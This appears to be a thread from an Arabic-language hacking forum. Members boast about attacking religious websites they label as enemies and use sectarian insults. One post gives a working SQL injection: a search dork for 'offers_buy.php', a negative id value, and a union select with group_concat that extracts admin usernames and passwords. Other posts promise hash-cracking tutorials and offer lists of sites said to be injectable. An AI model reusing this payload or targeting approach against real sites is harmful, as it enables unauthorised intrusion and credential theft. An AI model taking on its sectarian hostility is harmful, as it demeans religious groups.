السلام عليكم ورحمة الله وبركاته
اخوانى الكرام
هل من يساعدنى احد فى ايجاد هذه الثغره الغبيه التى فى جملة الاصدار
1.0.15
صراحه انا دخلت الميل وورم موقع الاستغلالات
http://www.milw0rm.com/search.php
وبحثت ما لقيت
فهل حد يساعدنى
الموقع ابن كلب مسيحي
سباب للنبى صلى الله...
السلام عليكم ورحمة الله وبركاته
كل التهانى والتباريك لاخى الحبيب فولكانو
بمناسبة انى طبقت الدورة ميا ميا ومفيش كلام فى الموضوع احب اهديكم اول موقع لي
موقع شيعي خبيث يسب الصحابة رضوان الله عليهم
وامهات المؤمنين زوجات النبى صلى الله عليه وسلم
هذا الموقع
الامام المهدي
حبيت بقى...
ههههههههههههههههههههههههههههههههههههههههههههههههه
والله انت غريب اخى سبحان الله انا كنت قاعد اخترق فيه برضه
هههههههههههههههههه
لووووووووووووووووول
يعنى انا وانت شغالين عليه نخترق
ولكن انا فكيت ابوه الحمد لله وهذا هو الاستغلال
قبل ما اوريك الاستغلال اخى الكريم عندما يكون العمود الاول...
اسم الملف المصاب
allinurl:offers_buy.php
اسم المتغير
id=9999-
الاستغلال هو
الكتابه ع الماس
+union+all+select+
اما هذا
group_concat(es_admin_name,char(58),es_pwd)
ف Group_concat()
هوا الامر المستخدم للاستعلام عن عمودين او ثلاثه او اكتر اما
es_admin_name,char(58)
فهو جدول...
تمام وانا محضر بقى لعيون الاخ فولكانو
درس بالفيديو مع اضخم برنامج لفك الهاش مع قواعد بيانات من غير مواقع ولا تتعب نفسك يا حلو الحلوين
ان شاء الله قريبا هنزل الموضوع وان شاء الله سيعجب الكل
تحياتى
تلميذ نجيب للاخ
فولكانو الحبيب
اخى الكريم
انا رصدت هذه المواقع فيها قواعد بيانات اصدار خامس واخرى اصدار رابع
والباقى عليكم عشان تطبقو الدورة عليها اخي الكريم اما كيف بنتعلم ؟
مش تخليك معاي ع الخط ...........
تحياتي الك
السلام عليكم
بما انى احد الاشخاص الى بيتعلمو الدورة على ايد المعلم الكبير اخونا فولكانو ربنا يجعله من اهل العلم الكبار اقدم لحضراتكم مجموعة من المواقع مصابة بثغرات اس كيو ال انجيكشن وللعلم فيها ايضا بعض المواقع مستخدمة قاعدة بيانات 4
اتمنى اكون شاركت بشىء
مجموعة مواقع مصابة ب sql injection...